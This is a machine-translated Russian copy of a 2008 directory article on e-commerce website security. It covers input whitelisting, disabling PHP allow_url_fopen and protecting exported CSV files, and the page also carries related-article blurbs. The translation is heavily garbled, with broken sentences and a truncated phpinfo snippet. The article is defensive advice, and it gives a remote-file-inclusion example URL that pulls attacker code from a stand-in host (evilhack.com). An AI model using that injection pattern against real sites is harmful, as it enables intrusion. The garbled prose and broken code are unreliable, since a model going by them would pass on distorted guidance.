The following content has been automatically translated by close 
E-коммерции - Подключение дыр в безопасности | Электронная торговля "статьи
Статьи сфере Logo

E-коммерции - Подключение дыр в безопасности

Эксперт Автор: Пол Робертс | статьи Аннотация
Word Count: 520 слов | Просмотров: 144 просмотра (ов)
Безопасность электронной коммерции сайт должен быть один из основных моментов при разработке сайта E-коммерция или программного обеспечения. Разработчик должен быть в курсе всех соображений безопасности при разработке сайта. С электронной торговли все большее распространение в эти дни, число атак, безусловно, возрастает. Паранойя это здоровая вещь для электронной коммерции Разработчики сайта, мы должны держать в ворота с вопросами безопасности, и держать наши глаза и уши открытыми. Хотя следующие серьезные лазейки, следующие лазейки, если настоящей легко исправлены.

Ниже перечислены некоторые соображения безопасности должны быть включены при разработке сайта. Данная статья не распространяется на E-кражи, пожалуйста, см. мою отдельную статью по этому вопросу.

Ввод пользователя - ввод каждого, будь то вступаем в количестве, поиск продуктов, введя имя и т.д., должны быть проверены на подозрительные символы. Если этого не сделать, то можно ввести "?>", закрытия конца тегов PHP и выполнять некоторый код PHP.

Гораздо безопаснее позволить цифр и букв AZ (столиц включен) и 0-9, и больше ничего, чем сделать список всех символов, которые не должны быть там. Проверка сценария необходимо, чтобы пролистать каждого символа по одному. Это должно быть достигнуто использованием проверки подлинности сервера в сторону, а не JavaScript. С помощью серверных проверки входных данных необходима для защиты от нежелательной символы

Там существует другая основным при выполнении PHP-кода. При использовании PHP есть параметр называется allow_url_fopen который позволит открытия файлов из сценариев PHP. Эта опция должна быть отключена, если не абсолютно необходимо.

Только представьте, у вас есть PHP скрипты для фиксированных верхних и нижних колонтитулов, а также для доступа к веб-страниц вам нужно набрать в http://www.mysite.com/index.php?page=page2. Все что требуется это злоумышленнику запускать сценарий, изменяя эти параметры, введя "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" с PHP код в файле "hacker.txt". Вы могли бы что-нибудь случится, PHP файла читать, удалены жизненно важные украденная информация.

Если вы не уверены, если этот параметр включен или выключен, скопируйте следующий код PHP в текстовый файл и загрузите его на свой веб-сервер:

phpinfo ();
?>

При доступе к скрипт на вашем веб-сервере, вы должны прийти через настройку конфигурации под allow_url_fopen.

Пользователь компьютера, при нормальных обстоятельствах не может найти значение этого параметра.

Будьте осторожны с экспортированные данные, как заказы, продукция в CSV и MySQL файлов. Если эти данные экспортируются из сценария и хранится на веб-сервере под общим т.е. имя файла. http://www.mysite.com/admin/output_tables.csv. Это только действительно проблема, когда экспортировала данные хранятся в файле в директории, которая является общедоступной. Существует два способа предотвратить эту лазейку безопасности - сначала в выходном файле за паролем каталогов, во-вторых, есть данные, расположенные внутри формы HTML Textarea элемент сценария. Владелец магазина, можно скопировать эту информацию из текстовых файлов и создать новый файл на свой компьютер и вставьте в них сведения.

Все что требуется это хакеров, чтобы найти этот файл, проверяя электронную демо-сайт торгово программного обеспечения и посмотреть на тот же файл на реальном сайте.
Пол Робертс

Об авторе / авторе Bio

Пол Робертс
Я бегу разработчик программного обеспечения, специализирующаяся на электронной коммерции, поисковая оптимизация и оценка программного обеспечения для печати называется ROBO дизайнерских решений. Я также разработать Новой Зеландии электронная коммерция решений и программного обеспечения под названием ROBO Design.

Article Source: http://www.ru.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05 | This Article has been viewed 144 times.

Rate Article

Related Videos

How to Strengthen Network Security with Cisco Network Manager
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Learn About Secure Computing
Как защитить компьютер Secure
Как проверить параметры безопасности в Windows Vista

Подробнее "Электронная торговля" Связанные статьи

Ниже перечислены другие статьи, связанные с вышеуказанной статьи из статьи "Электронная торговля" категорию.

Люди, интересующиеся в вышеуказанной статье "Е-коммерции - Подключение дыр в безопасности", также заинтересованы в соответствующих статьях, перечисленных ниже:

Запуск электронной коммерции это не только поддержание вашего сайта и работает. Клиенты полагаются на вашу способность служить им по телефону, факсу, электронной почте или другими средствами, и это требует от всех ваших систем, работает чтобы иметь возможность выполнять запросы клиентов.
Еще пару дней назад я был побеседовать с моим другом. Он праздновал 1 день рождения ребенка, и пришлось бежать от своего родного штата Керала и Ченнаи, его рабочее место. Он и его лучшая половина путешествовал между этими местами как минимум 4 раза в последний месяц.
Если вы уже делаете электронной торговли для любого промежутка времени, вы бы знали, что есть больше, чем scamers подлинного оптовых поставщиков служб каталогов Dropship. В мире электронного бизнеса, Salehoo и мировых брендов, являются авторитетными поставщиками услуг, которые приобрели большую популярность в последние несколько лет.
Если вы когда-либо были розничный интернет-продавец, вероятно, вы уже слышали о Salehoo или даже использовал его в своих интересах. Если вы только начинаете с вашим бизнесом, можно было спутать с смешанные Salehoo отзывы там. Теперь, давайте взглянем на то, что Salehoo это действительно все, и о предлагаемых ими услугах которых многие забывают.
Сколько людей вы знаете, что приобрели что-то в Интернете? Если, как я довольно мало, поэтому "Электронная торговля является новым онлайн Mall в мире покупок. Но кто работает этих онлайновых магазинов? Люди, как вы и я, вот почему этот бизнес находится на подъеме и будет продолжать расти сегодня и в будущем.
Если вы большой поклонник новейших электронных продуктов, то может возникнуть искушение идеей ведения собственного онлайн бизнеса электроники. Это не так сложно получить, когда вы начали принимать в полной мере использовать права Drop Shipping электроника услуги и есть большое вам на выбор.
Вы когда-нибудь в вашем местном магазине удобство и гадать, что было бы, если он принадлежал? Хотите быть хороший хозяин, будут люди, как ты? Ну эта статья покажет вам преимущества собственного онлайн магазина розничной торговли, или широко известный как электронная коммерция, которая отличается от реального местного магазина удобства.
Статьи Directory Home Все категории Интернет и E-Business Электронная торговля

Не удается найти то, что вы ищете? Попробуйте Google!
Copyright © 2005 -- Ларри Lim, Сингапур - статья поисковых каталога на ArticleSphere.com ™
Все права защищены по всему миру. Все товарные знаки и знаки обслуживания являются собственностью соответствующих владельцев.

Африкаанс Албанский Арабский Белорусский Болгарский Каталанский Китайский (упрощенный) Китайский (традиционный) Хорватский Чешский Датский Немецкий Английский Эстонский Филиппинский Финский Французский Галисийский Греческая Иврит Хинди Венгерский Исландский Индонезийский Ирландский Italiano Японский Корейский Латышский Литовский Македонский Малайский Мальтийский Голландский Норвежский Персидский Польский Португальский Румынский Русский Сербский Словацкий Словенский Испанский Суахили Шведский Тайский Турецкий Украинский Вьетнамский Валлийский Идиш